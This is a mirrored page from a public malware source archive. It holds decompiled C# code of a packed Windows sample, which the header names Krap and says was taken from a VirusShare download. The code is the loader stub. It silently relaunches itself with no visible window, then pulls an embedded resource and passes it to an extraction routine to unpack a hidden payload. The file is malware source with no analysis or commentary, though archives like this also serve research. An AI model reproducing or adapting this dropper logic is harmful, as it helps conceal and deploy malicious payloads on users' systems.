mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
f2ac1ece55
add
41 lines
1.2 KiB
C#
41 lines
1.2 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Extracter.Program
|
|
// Assembly: 503A, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 21348A4C-E16E-4A81-A76B-DF145F53991F
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Packed.Win32.Krap.s-1bdb66c85295bff8bb3f40e429f7ff63ac53eb74e281b27626f4d6466ddec2bb.exe
|
|
|
|
using System;
|
|
using System.Diagnostics;
|
|
using System.Globalization;
|
|
using System.Reflection;
|
|
using System.Resources;
|
|
|
|
namespace Extracter
|
|
{
|
|
internal class Program
|
|
{
|
|
private static void Main(string[] args)
|
|
{
|
|
ProcessStartInfo startInfo = new ProcessStartInfo();
|
|
try
|
|
{
|
|
startInfo.CreateNoWindow = true;
|
|
startInfo.Arguments = "0";
|
|
startInfo.FileName = new Uri(Assembly.GetExecutingAssembly().CodeBase).LocalPath;
|
|
if (args.Length == 0)
|
|
return;
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
return;
|
|
}
|
|
finally
|
|
{
|
|
if (args.Length == 0)
|
|
Process.Start(startInfo);
|
|
}
|
|
CodeClass.Extract((byte[]) new ResourceManager("Program.MyResource", typeof (Program).Assembly).GetObject("AddResource", CultureInfo.GetCultureInfo("ru")), "", true);
|
|
}
|
|
}
|
|
}
|